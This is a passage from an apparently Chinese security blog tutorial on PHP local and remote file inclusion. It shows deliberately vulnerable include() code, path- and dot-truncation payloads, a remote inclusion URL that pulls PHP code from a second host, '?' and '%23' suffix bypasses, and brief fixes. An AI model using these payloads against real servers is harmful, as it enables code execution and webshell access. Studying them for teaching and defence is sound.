class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span><span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">//</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span><span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">//</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/</span></span><br></pre></td></tr></table></figure>
<p><img src="https://s2.ax1x.com/2019/03/28/Aw4dgg.png" alt><br>另一种是点号绕过：（windows，点号需要超过256）<br><figure class="highlight x86asm"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="symbol">http:</span>//<span class="number">192.168</span><span class="meta">.1</span><span class="meta">.251</span>/<span class="keyword">test</span>/file.php?filename=<span class="keyword">test</span>.txt................................................................................................................................................................................................................................................................</span><br></pre></td></tr></table></figure></p>
<p><img src="https://s2.ax1x.com/2019/03/28/Aw4rbn.png" alt> </p>
<h3 id="远程文件包含"><a href="#远程文件包含" class="headerlink" title="远程文件包含"></a>远程文件包含</h3><p>包含在服务器上的txt文件，远程服务器存放一个txt文件，或者不被解析的php文件（包含的时候，包含的是返回的php源代码，所以php源代码不能被解析）</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="php"><span class="meta">&lt;?php</span></span></span><br><span class="line"><span class="php">    @<span class="keyword">include</span>($_GET[<span class="string">'filename'</span>]);</span></span><br><span class="line"><span class="php"><span class="meta">?&gt;</span></span></span><br></pre></td></tr></table></figure>
<p>远程服务器上的文件代码(test.txt)：<br><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="php"><span class="meta">&lt;?php</span> </span></span><br><span class="line"><span class="php">phpinfo();</span></span><br><span class="line"><span class="php"></span></span><br><span class="line"><span class="php"> <span class="meta">?&gt;</span></span></span><br></pre></td></tr></table></figure></p>
<p>payload：</p>
<figure class="highlight x86asm"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="symbol">http:</span>//<span class="number">192.168</span><span class="meta">.0</span><span class="meta">.107</span>/<span class="keyword">test</span>.php?filename=http://<span class="number">192.168</span><span class="meta">.0</span><span class="meta">.103</span>/<span class="keyword">test</span>/<span class="keyword">test</span>.txt</span><br></pre></td></tr></table></figure>
<p>效果：<br><img src="https://s2.ax1x.com/2019/03/28/AwhXBn.png" alt> </p>
<h3 id="任意文件包含配合任意文件上传"><a href="#任意文件包含配合任意文件上传" class="headerlink" title="任意文件包含配合任意文件上传"></a>任意文件包含配合任意文件上传</h3><p>通过上传一个图片马，然后通过文件包含这个图片马来getshell</p>
<h3 id="修复方案"><a href="#修复方案" class="headerlink" title="修复方案"></a>修复方案</h3><ul>
<li>php中可以使用open_basedir配置限制访问限制在指定的区域</li>
<li>过滤“.”、“\”、“/”</li>
<li>禁止服务器远程文件包含</li>
</ul>
<h3 id="有限制远程文件包含漏洞绕过"><a href="#有限制远程文件包含漏洞绕过" class="headerlink" title="有限制远程文件包含漏洞绕过"></a>有限制远程文件包含漏洞绕过</h3><p>首先准备一个在服务器上 放的txt文件：<br><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="php"><span class="meta">&lt;?php</span> phpinfo();<span class="meta">?&gt;</span></span></span><br></pre></td></tr></table></figure></p>
<p>漏洞代码：<br><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="php"><span class="meta">&lt;?php</span></span></span><br><span class="line"><span class="php">	@$filename = $_GET[<span class="string">'filename'</span>];</span></span><br><span class="line"><span class="php">    <span class="keyword">include</span>($filename.<span class="string">".html"</span>);</span></span><br><span class="line"><span class="php"><span class="meta">?&gt;</span></span></span><br></pre></td></tr></table></figure></p>
<h4 id="问号绕过"><a href="#问号绕过" class="headerlink" title="问号绕过"></a>问号绕过</h4><figure class="highlight x86asm"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="symbol">http:</span>//<span class="number">192.168</span><span class="meta">.1</span><span class="meta">.251</span>/<span class="keyword">test</span>/file.php?filename=http://<span class="number">192.168</span><span class="meta">.1</span><span class="meta">.239</span>/<span class="keyword">test</span>.txt?</span><br></pre></td></tr></table></figure>
<p><img src="https://s2.ax1x.com/2019/03/28/Aw4yEq.png" alt> </p>
<h4 id="号绕过"><a href="#号绕过" class="headerlink" title="#号绕过"></a>#号绕过</h4><p>由于是get传参，所以要先把“#”转码<br><figure class="highlight x86asm"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="symbol">http:</span>//<span class="number">192.168</span><span class="meta">.1</span><span class="meta">.251</span>/<span class="keyword">test</span>/file.php?filename=http://<span class="number">192.168</span><span class="meta">.1</span><span class="meta">.239</span>/<span class="keyword">test</span>.txt<span class="subst">%23</span></span><br></pre></td></tr></table></figure></p>
<p><img src="https://s2.ax1x.com/2019/03/28/Aw4c5V.png" alt> </p>
<h4 id="windows和linux差别"><a href="#windows和linux差别" class="headerlink" title="windows和linux差别"></a>windows和linux差别</h4><p>在windows上“%00”、“%3f”可以绕过，在linux除此之外“%20”也可以绕过</p>

        
        <br>
        <div id="comment-container">
        </div>
        <div id="disqus_thread"></div>

        <div id="lv-container">
        </div>

    </div>
</div>

    </div>
</div>


<footer class="footer">
    <ul class="list-inline text-center">
        
        

        

        

        

        

    </ul>
    
    <p>
        <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
        转发请备注<a href="“https://luobuming.github.io”">一筐萝卜</a>的个人博客 <br>
        本站总访问量<span id="busuanzi_value_site_pv"></span>次
       </p>
</footer>




</body>

<script>
    // We expose some of the variables needed by the front end
    window.hexo_search_path = "search.json"
    window.hexo_root = "/"
    window.isPost = true
</script>
<script src="https://cdn.bootcss.com/jquery/3.3.1/jquery.min.js"></script>
<script src="/js/index.js"></script>
<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>




</html>
